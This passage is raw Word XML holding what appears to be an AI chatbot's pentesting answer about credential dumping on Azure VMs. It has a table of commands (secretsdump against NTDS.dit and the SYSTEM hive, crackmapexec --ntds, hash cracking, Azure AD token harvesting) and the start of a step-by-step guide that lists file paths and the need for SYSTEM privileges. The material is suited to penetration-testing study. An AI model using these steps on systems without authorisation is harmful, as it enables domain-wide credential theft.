      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="67295437" w14:textId="77777777" w:rsidTr="0039559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6D23BE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049009C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E012D14" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049009C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Commands/Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E2B382C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049009C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B16DD01" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049009C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="45A90421" w14:textId="77777777" w:rsidTr="003955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90AEB4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Identify DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="448AF85F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>nltest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>dsgetdc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>:&lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22672B35" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AF149CC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Confirm Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="52CF19CC" w14:textId="77777777" w:rsidTr="003955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104AEC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Dump local hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C16E68D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>fgdump.exe, secretsdump.py LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65976625" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Local Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C368667" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Local password hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="121D84B5" w14:textId="77777777" w:rsidTr="003955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1D9507" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Dump AD hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FEB1949" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>secretsdump.py -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve"> -system </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>SYSTEM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9360D83" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29B14E81" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Domain user password hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="367BFFA5" w14:textId="77777777" w:rsidTr="003955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78BF11" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Dump remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6046A233" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>crackmapexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve"> &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>&gt; -u &lt;user&gt; -p &lt;pass&gt; --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>ntds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0C9731E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Domain Controller remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5211A7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Dump domain hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="469594AA" w14:textId="77777777" w:rsidTr="003955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0B3DD3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Crack hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204F9C2C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve">john, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>hashcat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92719A1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Offline hash cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C0F0091" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Plaintext passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="0049009C" w14:paraId="03B532C9" w14:textId="77777777" w:rsidTr="003955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751D5D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Token harvest AzureAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF4704B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t xml:space="preserve">TokenCache.dat analysis, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0049009C">
              <w:t>AzureADPwn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284E2A9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Azure AD joined machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF83926" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0049009C">
              <w:t>Azure AD tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="596A038A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="65CD6269">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="531699A7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="0049009C" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve">If you want, I can also provide a fully detailed </w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">step-by-step Azure VM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0049009C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> guide</w:t>
      </w:r>
      <w:r w:rsidRPr="0049009C">
        <w:t xml:space="preserve"> covering initial access, privilege escalation, lateral movement, and cleanup with all commands and explanations. Just ask!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25117150" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="2934D524" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="6AE1A011" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Certainly! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, detailed, deduplicated summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">how to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Windows/Linux VMs for Local accounts, AD accounts, and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>credential dumping with NTDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> using PowerShell, external tools, and Metasploit, with step-by-step commands, Azure VM vulnerabilities exploited, and every minute detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC68BC8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="13453156">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED6F2B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to Pentest Azure Windows/Linux VMs for Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE93AD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Focus: Local Accounts, AD Accounts (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>), and Microsoft Entra ID Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203F92A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="608265E4">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A8544" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 1: Windows VMs — Credential Dumping from Active Directory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405766B5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Background:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C01E5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> is the AD database file on Domain Controllers, located at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1ADB9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>C:\Windows\NTDS\NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A624BAD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Password hashes (NTLM) and other secrets are encrypted with keys stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> hive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE11E6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>C:\Windows\System32\config\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19018D88" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Extracting these files enables dumping domain account credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F603D" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="058BB7C5">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3BE916" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Prepare Environment &amp; Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0169E49C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prerequisite:</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> Obtain SYSTEM privileges on the Windows VM (e.g., via exploit, RDP as admin, or privilege escalation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673F290" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check if machine is a Domain Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> only on DCs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D5981" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>dsgetdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>domain_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF6AFA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Locate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> and SYSTEM hive files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47CCBD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>C:\Windows\NTDS\NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086594A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>C:\Windows\System32\config\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C0B47" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="5C15AF2C">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
